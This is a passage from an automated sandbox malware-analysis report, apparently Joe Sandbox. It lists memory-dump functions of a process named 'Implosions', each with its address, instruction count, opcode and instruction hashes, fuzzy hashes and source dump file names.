              • API String ID:
              • Opcode ID: 59ddd110430f266c13c5c3b83c4ed27842a645da30b578f4a3d3629dfbfc597a
              • Instruction ID: 11c46e1fdfce5903d101f033b4aabe1a6ee442942f7ff716a951fd274aa7a12c
              • Opcode Fuzzy Hash: 59ddd110430f266c13c5c3b83c4ed27842a645da30b578f4a3d3629dfbfc597a
              • Instruction Fuzzy Hash: FD31BB31B102059FD754AB79D419BAE7FEAFF88310F584469E50AD7380DE70AD42CB90
              Function 05CA6E00 Relevance: .1, Instructions: 110COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7dc24aaa2cf3ef0fd091024535bd22193347f261aaa9d2364322b83e09e244cd
              • Instruction ID: 95f8100fb863dfc5ac89549cf443fb1d0630471bc42353e25d88543b51d88c0a
              • Opcode Fuzzy Hash: 7dc24aaa2cf3ef0fd091024535bd22193347f261aaa9d2364322b83e09e244cd
              • Instruction Fuzzy Hash: 71418B30B043459FDB64ABB8942976E7FF2BF84300F5449AAD846DB381EF30AD408B41
              Function 05CA610F Relevance: .1, Instructions: 106COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 525f6b4f726f1039084d96ad9af8ecf211a91cb82be7aa1e8a4dfc7506a710f3
              • Instruction ID: 1aa4e2ccb9438150af77d1ebdc63638775786148429e1709a1f0a2e6fd9bfebc
              • Opcode Fuzzy Hash: 525f6b4f726f1039084d96ad9af8ecf211a91cb82be7aa1e8a4dfc7506a710f3
              • Instruction Fuzzy Hash: E3411834A10605CFCB45EFA8C959AADBFB2FF88304F548568E506AB375DB34AD42CB44
              Function 05CEEE30 Relevance: .1, Instructions: 103COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: eba837b55e4e6dd8ef07655703859ba4c5b0a38f90ec6d31695726611d4ea743
              • Instruction ID: 52988b26385651c3923abf35f950895548cd52e024afb60fbb6d73d967015943
              • Opcode Fuzzy Hash: eba837b55e4e6dd8ef07655703859ba4c5b0a38f90ec6d31695726611d4ea743
              • Instruction Fuzzy Hash: BF417134E10249DFDB04EFA4D999A9DBBB2FF45340F14892DE502AB354DF74A945CB80
              Function 05DE7B63 Relevance: .1, Instructions: 102COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: de9d963a6c7fa1fa3d41db84b744308ae98eadcd151b3f5cd411c3c0e48410b7
              • Instruction ID: 5a95fb372443cf15907b7f506fe866e61b4913fb533bfcde80b93cd7acd9873e
              • Opcode Fuzzy Hash: de9d963a6c7fa1fa3d41db84b744308ae98eadcd151b3f5cd411c3c0e48410b7
              • Instruction Fuzzy Hash: 7F31C230B043849FC755EB78D854A6E7FB6EF85210B1480ABE44ADB392DF349C05CB95
              Function 05DE95A7 Relevance: .1, Instructions: 100COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ea4c88b8725798cebc29d0e12c8d0269bd03ad27c3ca7a5ae006233fa210134b
              • Instruction ID: cca5be6f6761c47c9ae0e54ee2188880ab1bf0333c999e01695520b5886959b6
              • Opcode Fuzzy Hash: ea4c88b8725798cebc29d0e12c8d0269bd03ad27c3ca7a5ae006233fa210134b
              • Instruction Fuzzy Hash: 9541A330611212AFCB15EF68E99496ABF72FF85301B04869AE8058B356DB30ED45CFE5
              Function 05D6081C Relevance: .1, Instructions: 98COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5ade7ec28bb0f2b553a97210ab81b1944e72691a9ac0bb638de5d42d63da2606
              • Instruction ID: bb7abbe2ac60de039009340f6a47bcfa8f08f7bb71521730cdcd3174406a78c1
              • Opcode Fuzzy Hash: 5ade7ec28bb0f2b553a97210ab81b1944e72691a9ac0bb638de5d42d63da2606
              • Instruction Fuzzy Hash: 8841F374A10209DFDB09DFA8D488AEDBBB6FF48304F14446AE405A7360DB31AD86CF90
              Function 05CE1CD3 Relevance: .1, Instructions: 97COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d9d68be400296cdd98143825096efc8f082d3e3f6e736518d7712328456d813c
              • Instruction ID: a11d466dbe969ab3f55607b5b1f835f440dc8f96d14dee159eeca873706e4ec4
              • Opcode Fuzzy Hash: d9d68be400296cdd98143825096efc8f082d3e3f6e736518d7712328456d813c
              • Instruction Fuzzy Hash: 233140302107056FC711EB68D994A9EF7A7FF803507948A28D1568B768DFB1F98A8BD0
              Function 05CE585B Relevance: .1, Instructions: 97COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ce4b0415f84dd0e9fa7fc1bc91f11dfc64586dc87cfcf60a578efd6f64e4736d
              • Instruction ID: 52622d0a8d055e077eaaaf004067ba26e3dca27c8c64934b4f4c5cf089f10475
              • Opcode Fuzzy Hash: ce4b0415f84dd0e9fa7fc1bc91f11dfc64586dc87cfcf60a578efd6f64e4736d
              • Instruction Fuzzy Hash: 0831D5367043108FD7149F6AE89497EBBE6FFC9226714882EE906C7380CB35E844CB20
              Function 05CA1279 Relevance: .1, Instructions: 97COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3e492ab7461f7b3e4a39e34b166224e747f91e3fe13f4428b02da8622027c1de
              • Instruction ID: 03952de1475fb3786d837169c3a0cc34c863f91b970f674ba3edb0b83d66ab0d
              • Opcode Fuzzy Hash: 3e492ab7461f7b3e4a39e34b166224e747f91e3fe13f4428b02da8622027c1de
              • Instruction Fuzzy Hash: E131D275A00606DFDB14DF69C944BAABBB2FF88314F148968E9059B360DB30ED54CF90
              Function 05CE1CD8 Relevance: .1, Instructions: 96COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6864427ba366d3bb673ddff32c47eaaf6ceeffa243d52a1eda5eec8d2211061a
              • Instruction ID: 40b56b27901ad102d80d9d2afe90f13ef29164d73d82733af1c7512cad1adaef
              • Opcode Fuzzy Hash: 6864427ba366d3bb673ddff32c47eaaf6ceeffa243d52a1eda5eec8d2211061a
              • Instruction Fuzzy Hash: 343152302107056FC711EB68D994A9EF7A7FF803507548A28D1568B768DFB1F98E8BD0
              Function 05DEFEA8 Relevance: .1, Instructions: 96COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: be8f2430206a20d0c748954281e8450ffcaba10ba4a64efa5e83b154771ee6dd
              • Instruction ID: 0a674f551c94fd6976a9c2a80d9e3b0f2db41f09d61d40e696a68790986e02d2
              • Opcode Fuzzy Hash: be8f2430206a20d0c748954281e8450ffcaba10ba4a64efa5e83b154771ee6dd
              • Instruction Fuzzy Hash: 7131F135A002598FCB04EF99D4449DDBBF2EF8C321F1990AAE405B7361DB30A995CFA0
              Function 05CA5D3B Relevance: .1, Instructions: 93COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e57dd75f120364c022d8a74f6c263a1eb2b73ef46c7ed3d83792ff40c549519f
              • Instruction ID: f00a044da377900ad32116e0ce1c656ccbf587fef9a0de65b940c4a012e409d2
              • Opcode Fuzzy Hash: e57dd75f120364c022d8a74f6c263a1eb2b73ef46c7ed3d83792ff40c549519f
              • Instruction Fuzzy Hash: 1431E232B002158FCF24DB68D5086EDBBF6FF89715F00897AE406EB250DB74A945CB90
              Function 05DEA819 Relevance: .1, Instructions: 92COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ef2847d8294b4c666435b87ae83ebfd6ee6a134b1d8f861921f57937e9bb0ea1
              • Instruction ID: 98e10b263641cd4b3c1bb5ca55f4ca3597e0f078a11e8a46906158b077ec8b20
              • Opcode Fuzzy Hash: ef2847d8294b4c666435b87ae83ebfd6ee6a134b1d8f861921f57937e9bb0ea1
              • Instruction Fuzzy Hash: 8031D631F10215AF8B12D758E96949DFBB7EBC82507148656EC03A7314DF309D0A8BD5
              Function 05CE6EFB Relevance: .1, Instructions: 91COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2b9a2676ada0fda189ad32f5998046a0c715324255d8735c2c9a3a0ef6e22a66
              • Instruction ID: 0fe99c7e90e052aec86fc0982020c891641af7eb375a8b0c1ea2936691f9f7a1
              • Opcode Fuzzy Hash: 2b9a2676ada0fda189ad32f5998046a0c715324255d8735c2c9a3a0ef6e22a66
              • Instruction Fuzzy Hash: C4317E71A002089FCB14DF64D954AAEBBF7FF88710F144928D806AB394CB70AD85CB90
              Function 05DE73B1 Relevance: .1, Instructions: 91COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9d1db79753b8109f43517e5e8bb5dd39531871f36147c3a27ef6204ae3b6de09
              • Instruction ID: f46315fd58c6ec98cb8e803a0e91c9e2e191e5991489b315348e03a21777d8a1
              • Opcode Fuzzy Hash: 9d1db79753b8109f43517e5e8bb5dd39531871f36147c3a27ef6204ae3b6de09
              • Instruction Fuzzy Hash: BE3181357006019FDB54EB29D894A6ABBA6FFC4361B14853AE947C7354EF70EC42CB90
              Function 05CE323B Relevance: .1, Instructions: 90COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 55cf31e8f9cebb832bab67384e60c5f1bbffbf59e2e3405fc19978b63e9b788d
              • Instruction ID: ac19157b97aeaa7ab20bd2cdd628ea156cf455be24a9ef7d990c0493e377b1ed
              • Opcode Fuzzy Hash: 55cf31e8f9cebb832bab67384e60c5f1bbffbf59e2e3405fc19978b63e9b788d
              • Instruction Fuzzy Hash: 11313734601700DFCB14DF69D999A6ABBB3FF88201B50AE29E84797791CB34F845CB90
              Function 05DE73C0 Relevance: .1, Instructions: 90COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e08e817a096cb06f90c57d74ef620c9b60f4b394a7e80d0bc15f3a3a32e62972
              • Instruction ID: 24c335095b1642d179e52d5ea8917e973016bbfa560afe0d09b4e49f8cfe5d76
              • Opcode Fuzzy Hash: e08e817a096cb06f90c57d74ef620c9b60f4b394a7e80d0bc15f3a3a32e62972
              • Instruction Fuzzy Hash: CD3171347046059FCB54EB29D884A6ABBE7FFC8261714853AA947C7354EF70EC42CB90
              Function 05DE93E0 Relevance: .1, Instructions: 90COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 80b12fc11d592f8b759ef2e19254f4d6fdfbecdd62ff0554756058101e181325
              • Instruction ID: 4905d55175ee428d1eda6a7d6045ec0cb77ff97fed051113c9963010f6ead571
              • Opcode Fuzzy Hash: 80b12fc11d592f8b759ef2e19254f4d6fdfbecdd62ff0554756058101e181325
              • Instruction Fuzzy Hash: 4C31A0313003019FC725EB39D954BAE7BA7EF84350F54892AE5068B398DE74ED49CB94
              Function 05CAFC08 Relevance: .1, Instructions: 90COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 671763b297aea55a2c6365279edf887708181a4fe939596f4c2b5a7432789796
              • Instruction ID: 2cd51f8ba8d962e21e7dd01c0c9670f4394b69471c9de2f9192697661175e518
              • Opcode Fuzzy Hash: 671763b297aea55a2c6365279edf887708181a4fe939596f4c2b5a7432789796
              • Instruction Fuzzy Hash: E4319075B102059FCB14DFA4D885AAEFBB2FF88314F148968E916D7394DB70AC41CBA0
              Function 05CE4378 Relevance: .1, Instructions: 88COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b43c4b340e1a1760ee1149c20a7254feb6d99aa7713339a510cae8aac7d4d17f
              • Instruction ID: bb03b5082bb7680f592e5a07b6cef016077d1f4e4a909e0c0bfaab788e9d6f45
              • Opcode Fuzzy Hash: b43c4b340e1a1760ee1149c20a7254feb6d99aa7713339a510cae8aac7d4d17f
              • Instruction Fuzzy Hash: 133158B4B00205CFCB14DF64E99896EBBB2FF88701B108929E9029B750DB74AC55CBA0
              Function 05CE8F30 Relevance: .1, Instructions: 88COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 50decf15681720a2e1cd7b3b6e9261da76c1c0e628bb69c63996d369fc6f6ac4
              • Instruction ID: c42d55bec315abbb447d927ebae1958ecfc0b854bb54170c41a3ab47a4e6c277
              • Opcode Fuzzy Hash: 50decf15681720a2e1cd7b3b6e9261da76c1c0e628bb69c63996d369fc6f6ac4
              • Instruction Fuzzy Hash: D621D6367482249FD754CB68D085BAABBF6EF44360B14886AF909CB341D732ED81C794
              Function 05CECB5B Relevance: .1, Instructions: 87COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bbb4d8a2df6f8461a0cea1fc6812f3d7ce3002bf925b05b4bd554f3efdf8d7a5
              • Instruction ID: a3e8e325a2d1b82a569de53ba5feda8a241c4186678b40be2a19d72127ab5c3a
              • Opcode Fuzzy Hash: bbb4d8a2df6f8461a0cea1fc6812f3d7ce3002bf925b05b4bd554f3efdf8d7a5
              • Instruction Fuzzy Hash: 0C31AF30B0070A8FDB04EF2DE95496E7BF2FF84204B504669E406AB354EB30ED45CB95
              Function 05D64BA0 Relevance: .1, Instructions: 87COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cbf3c5456c0abc7b562664aefd4f60d3c49e9efc04bc89b0db53a0f93d7fe5cc
              • Instruction ID: 0184d626bd190349df1bc5469d04be441fa4c8946fd1f4e2d38f6171ca6ecd29
              • Opcode Fuzzy Hash: cbf3c5456c0abc7b562664aefd4f60d3c49e9efc04bc89b0db53a0f93d7fe5cc
              • Instruction Fuzzy Hash: 3231B431B003059FCF15EB68D894AAE7BB6FF85200B518666D406DB359EB30EC45CB91
              Function 05D64228 Relevance: .1, Instructions: 85COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 99f25f200703a526d04ee8d5f2ad60535ab5b2f7b5e99e929e5f464b3821e341
              • Instruction ID: 1a8b379f7837536e3d47a80c8adad8563514e7f152218770c12ee2cd2ed0d7b1
              • Opcode Fuzzy Hash: 99f25f200703a526d04ee8d5f2ad60535ab5b2f7b5e99e929e5f464b3821e341
              • Instruction Fuzzy Hash: 75315A35A002198FCB15DFA8D594AED7BF2AF88211F14046AE901AB350DB35DD45CFA5
              Function 05CABA2F Relevance: .1, Instructions: 84COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 98283a3e6b1e07e0adf815a8b91304ca4d7bf173247fabf0f0a93daf5b5c8411
              • Instruction ID: 8a1aa6c3adaeae1923c7dda5bb997c0e0a3daa226939aaced239549f8ff38791
              • Opcode Fuzzy Hash: 98283a3e6b1e07e0adf815a8b91304ca4d7bf173247fabf0f0a93daf5b5c8411
              • Instruction Fuzzy Hash: 19314D31B01206CFCB14EF65D999AA97BF6FF89709B1448A8E402EB354DF75AD01CB60
              Function 05DEEAFC Relevance: .1, Instructions: 83COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 642c890e8145e27e655233bf1ecf4d29091c7788b99836aacdb8290a32acbe4a
              • Instruction ID: 7d31e29633e87f911fbb5ccbf646398db490dbce95c1bdea2bfdfde7671fbb85
              • Opcode Fuzzy Hash: 642c890e8145e27e655233bf1ecf4d29091c7788b99836aacdb8290a32acbe4a
              • Instruction Fuzzy Hash: C6313E74715311CFCB9A6B34A02E12C7FA6AB49212344096EF817CB390DF39D985CB59
              Function 05CE5368 Relevance: .1, Instructions: 81COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3ef4e23ee3230621234a8319e7f4c43a426e73398f5aa33aa06555b4fb12b9a8
              • Instruction ID: cfa40779872c16ed982feee9d223023d8d205ecdc2ee6c39fa9c1f85f5edd28d
              • Opcode Fuzzy Hash: 3ef4e23ee3230621234a8319e7f4c43a426e73398f5aa33aa06555b4fb12b9a8
              • Instruction Fuzzy Hash: B121A131A04364AFCB55ABB8A4182AE7FF5EF85241F1444A6E916D7384EF34CE05CB91
              Function 05DE60E8 Relevance: .1, Instructions: 80COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1d6e5e04edd56f972146c95d837d83585b5c0dc041d263c17e4e69e340de5079
              • Instruction ID: f07630bcbc814e615e29866b0bedfadfe540c73ef891608cbca67ff47013989d
              • Opcode Fuzzy Hash: 1d6e5e04edd56f972146c95d837d83585b5c0dc041d263c17e4e69e340de5079
              • Instruction Fuzzy Hash: DB21E530A046118FCB11EB78D844A6DBBE2FB54320F65466AD4669B3A2DB30ED41CB90
              Function 05DE78B8 Relevance: .1, Instructions: 80COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 952d2912ebcb3260e76a19952c07cf83de2b02683b4e1e4d796e3820dfa2094f
              • Instruction ID: 098577a375afa5d88a9108c44f24f9c3406a313a5de378a6ff152a106e2ea04e
              • Opcode Fuzzy Hash: 952d2912ebcb3260e76a19952c07cf83de2b02683b4e1e4d796e3820dfa2094f
              • Instruction Fuzzy Hash: 27319E34A00205AFCB04DF68D8948EDBBB2FF89304764819AE9059B325DB31ED06CFA0
              Function 05CAB781 Relevance: .1, Instructions: 80COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4977c96eb083f2fd620dca9addd997db2fccb3ef29d154f8b10f9beeb1f9d5bd
              • Instruction ID: 072a88baae7a2e423017aeea441c26e04d4c47d78a7a49107b5f301dca888850
              • Opcode Fuzzy Hash: 4977c96eb083f2fd620dca9addd997db2fccb3ef29d154f8b10f9beeb1f9d5bd
              • Instruction Fuzzy Hash: B6218C72A40606CFDB10DF69E88967E7FF3FB84705B108829E416DB251EB749D418BA1
              Function 05D63917 Relevance: .1, Instructions: 80COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 13a3a5cd9288e4a92dd729be8322a79e870fda4f53c584fb3a90d4b9d8b03692
              • Instruction ID: 02d421957913413a5d021cbd4bbd8f32d939c13a985086b51df883f95fddbd96
              • Opcode Fuzzy Hash: 13a3a5cd9288e4a92dd729be8322a79e870fda4f53c584fb3a90d4b9d8b03692
              • Instruction Fuzzy Hash: 4821AE32A00209AFCF01CE54D844A9FBBB6EF89720F158656F901BB294DB71ED158BE0
              Function 05D64BB0 Relevance: .1, Instructions: 80COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fcd5aeffe0173de99873a5a4b2c0d54d7570a3f847e84771ea2cce11ba7d6c96
              • Instruction ID: 016b4724958f2b2601dd462aabe084e4df082a566cb4a9d9aa742dae2c5ed48d
              • Opcode Fuzzy Hash: fcd5aeffe0173de99873a5a4b2c0d54d7570a3f847e84771ea2cce11ba7d6c96
              • Instruction Fuzzy Hash: BD219130B007098FCB15EB68D4949AE77B6FF89600B51826AD406DB369DB30EC45CB91
              Function 05D60738 Relevance: .1, Instructions: 77COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2d64afdb2e88d6974f79a031a962374c7b4ee5796e5b67cffe5d03317706ecd3
              • Instruction ID: a733ed14cd9297d7c47a462a3ad3f6cd2145684f77bc3a4775c211bebbd9e995
              • Opcode Fuzzy Hash: 2d64afdb2e88d6974f79a031a962374c7b4ee5796e5b67cffe5d03317706ecd3
              • Instruction Fuzzy Hash: 6C210A343082418BD71197389C4CA2ABB67BFC1624B188327A859DB6D5EB35D84BCBD7
              Function 05DE78C8 Relevance: .1, Instructions: 76COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9333e1840190ad75f92c20ceab85ab9a82c9b14ae9c8085bcdd80c53598372d8
              • Instruction ID: 436bfbd14bab36c8b9e45d79845333bfe8b2e9743555912e989ce10866bc4a36
              • Opcode Fuzzy Hash: 9333e1840190ad75f92c20ceab85ab9a82c9b14ae9c8085bcdd80c53598372d8
              • Instruction Fuzzy Hash: 40312F74B00205AFCB04DF68D5948DDBBB6FF89314764819AE9059B365DB31ED06CFA0
              Function 05CA83B1 Relevance: .1, Instructions: 76COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
